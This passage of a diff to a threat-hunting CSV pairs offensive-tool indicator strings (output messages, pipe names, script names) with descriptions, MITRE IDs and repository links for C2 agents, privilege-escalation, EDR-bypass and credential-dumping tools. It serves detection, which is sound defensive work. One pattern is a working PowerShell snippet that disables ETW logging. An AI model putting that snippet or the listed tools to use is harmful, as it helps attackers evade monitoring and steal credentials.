-"*[+] Save encrypted shellcode to *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z"
-"*[+] SeImpersonatePrivilege enabled*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z"
+"*[+] Registry key set. DLL will be loaded on reboot*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*[+] Safety checks passed. Implanting your DLL*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*[+] Save encrypted shellcode to *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
+"*[+] SeImpersonatePrivilege enabled*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z"
 "*[+] Stole token from*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" -"*[+] Successfully downloaded legitimate GPO from SYSVOL to *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*[+] Successfully injected malicious scheduled task*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*[+] Successfully spoofed GPC gPCFileSysPath attribute*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*[+] The encrypted payload with *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*[+] Your payload must be executed now !*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*[+] Successfully downloaded legitimate GPO from SYSVOL to *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[+] Successfully injected malicious scheduled task*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[+] Successfully spoofed GPC gPCFileSysPath attribute*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[+] The encrypted payload with *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*[+] Your payload must be executed now !*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*[i] 
AAD Join:*enumerate*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*[i] Credman:*Credential Blob Decrypted*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*[i] Hooked Ntdll Base Address : *","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*[i] Unhooked Ntdll Base Address: *","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled'*'NonPublic*Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider'*'NonPublic*Static').GetValue($null)*0)*","offensive_tool_keyword","powershell","impair the defenses of the targeted 
system by disabling ETW logging for PowerShell. This can make it difficult for security teams to monitor and analyze PowerShell activities on the system potentially allowing adversaries to perform malicious actions without being detected","T1562","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*['spawnto']*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*[x] Cannot load NTDLL.DLL*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*[x] Cannot load NTDLL.DLL*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*[X] Your harvest exploded:*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*\ rev_shell.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*\*.O365.GroupMembership_AdminGroups.txt*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" 
@@ -5939,30 +6010,32 @@ "*\\.\pipe\pwned/pipe/srvsvc*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","pipe name","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*\\:C*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed c:\\","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\\??\\Jormungandr*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","0","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" -"*\\\\*\\*\\Get-FileLockProcess.ps1*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" -"*\\\\.\\aswSP_Avar*","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","0","N/A","10","3","228","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"*\\\\*\\*\\Get-FileLockProcess.ps1*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*\\\\.\\aswSP_Avar*","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","0","N/A","10","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" "*\\\\.\\pipe\\mal*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" -"*\\\\.\\pipe\\warpzone8*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*\\\\127.0.0.1\\pipe\\warpzone8*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*\\127.0.0.1\c$*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\\\\.\\pipe\\warpzone8*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*\\\\127.0.0.1\\pipe\\warpzone8*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*\\127.0.0.1\c$*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*\\c$\Windows\Temp\*.dmp*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*\\DCSC_stdInPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral 
movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" -"*\\DCSC_stdOutPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*\\DCSC_stdInPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*\\DCSC_stdOutPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" "*\\GetWebDAVStatus.exe*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" "*\\pipe\\DAV RPC SERVICE*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" "*\1.Encrypt_shellcode*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - 
T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" -"*\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*\AbandonedCOMKeys.*","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). 
Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*\AbandonedCOMKeys.*","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). 
Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\adcs.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\ADCSPwn*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*\add_computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\ADFSpoof.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" -"*\ADFSpray*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","75","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*\ADFSpray*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*\adm2sys.py*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" -"*\admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 